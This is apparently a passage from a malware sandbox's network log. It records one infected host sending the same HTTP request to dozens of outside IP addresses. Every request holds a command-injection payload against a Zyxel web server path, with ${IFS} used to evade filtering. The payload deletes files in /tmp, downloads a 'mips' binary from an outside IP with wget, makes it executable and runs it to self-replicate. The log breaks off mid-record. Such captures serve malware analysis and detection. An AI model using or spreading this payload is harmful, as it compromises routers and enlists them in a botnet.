                              Mar 31, 2024 08:42:27.590291977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9950192.168.2.134406445.245.78.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590312004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9951192.168.2.1354388205.153.2.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590348005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9952192.168.2.135680487.97.96.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590398073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9953192.168.2.134086436.10.34.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590436935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9954192.168.2.133404271.68.14.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590483904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9955192.168.2.135205425.123.159.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590512037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9956192.168.2.1338918146.216.133.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590574980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9957192.168.2.135693085.135.115.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590621948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9958192.168.2.133646473.53.81.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590662956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9959192.168.2.1342364153.185.129.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590702057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9960192.168.2.134447019.40.68.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590733051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9961192.168.2.134871278.128.177.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590756893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9962192.168.2.1342170162.30.157.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590789080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9963192.168.2.1356510122.49.181.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590835094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9964192.168.2.1339700117.46.196.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590867043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9965192.168.2.1333206186.172.133.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590882063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9966192.168.2.133771889.155.86.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590912104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9967192.168.2.1355614220.205.126.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590960979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9968192.168.2.135979096.29.204.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590991020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9969192.168.2.1360220196.120.167.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.591006041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9970192.168.2.1341496180.152.240.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.591031075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9971192.168.2.1347856161.94.4.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.591077089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9972192.168.2.133699888.85.142.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.591114998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9973192.168.2.135395013.68.92.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.591151953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9974192.168.2.1360410168.110.191.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.591187954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9975192.168.2.1345030189.235.210.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.591218948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9976192.168.2.13494645.104.122.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.591239929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9977192.168.2.1354126133.100.245.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595268011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9978192.168.2.1349814209.14.53.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595292091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9979192.168.2.1351790170.143.73.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595335007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9980192.168.2.1346112188.183.15.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595407009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9981192.168.2.1333630145.80.62.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595417976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9982192.168.2.1334024176.97.114.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595467091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9983192.168.2.1353956209.137.184.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595480919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9984192.168.2.1343900218.104.157.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595520973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9985192.168.2.1349582123.69.117.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595563889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9986192.168.2.1349140121.108.187.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595598936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9987192.168.2.1349732203.10.97.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595643997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9988192.168.2.133913080.48.57.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595654964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9989192.168.2.134095020.149.40.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595679998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9990192.168.2.1344078113.104.229.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595722914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9991192.168.2.1360084166.133.95.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595760107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9992192.168.2.1337904219.83.127.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595784903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9993192.168.2.134369478.218.121.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595805883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9994192.168.2.1350152173.152.185.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595837116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9995192.168.2.134618496.65.50.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595911026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9996192.168.2.134474625.46.129.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595947981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9997192.168.2.134590857.240.179.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595978975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9998192.168.2.135503259.166.212.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.595994949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9999192.168.2.133389884.232.199.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596052885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10000192.168.2.13519101.26.122.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596079111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10001192.168.2.1350332210.209.95.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596132994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10002192.168.2.1344164152.52.176.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596194983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10003192.168.2.1346486205.231.101.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596213102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10004192.168.2.1337808193.122.109.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596285105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10005192.168.2.13602984.117.26.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596312046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10006192.168.2.1353764192.199.212.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596394062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10007192.168.2.1341140165.139.24.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596438885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10008192.168.2.1345440110.47.21.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596487045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10009192.168.2.1347960167.108.201.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596520901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10010192.168.2.134899031.187.113.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596585035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10011192.168.2.1348294196.16.138.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596641064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10012192.168.2.13411228.10.38.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596693039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10013192.168.2.1344656188.100.196.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596728086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10014192.168.2.136067264.71.242.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596781969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10015192.168.2.135520635.217.160.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596826077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10016192.168.2.1338862101.253.119.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596926928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10017192.168.2.1351322153.206.200.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.596940041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10018192.168.2.1354290213.238.192.170443
                              TimestampBytes transferredDirectionData
